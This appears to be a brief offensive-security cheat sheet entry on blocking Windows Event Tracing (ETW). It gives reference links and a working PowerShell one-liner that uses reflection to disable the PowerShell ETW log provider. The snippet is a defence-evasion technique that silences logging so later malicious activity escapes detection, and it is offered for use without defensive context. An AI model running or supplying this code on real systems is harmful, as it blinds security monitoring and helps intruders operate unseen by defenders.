# ETW Block

* <https://bmcder.com/blog/a-begginers-all-inclusive-guide-to-etw>
* <https://threadreaderapp.com/thread/1706772248802291929.html>

Blocking .NET ETW:

* <https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/>

Blocking PowerShell ETW:

```powershell
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
```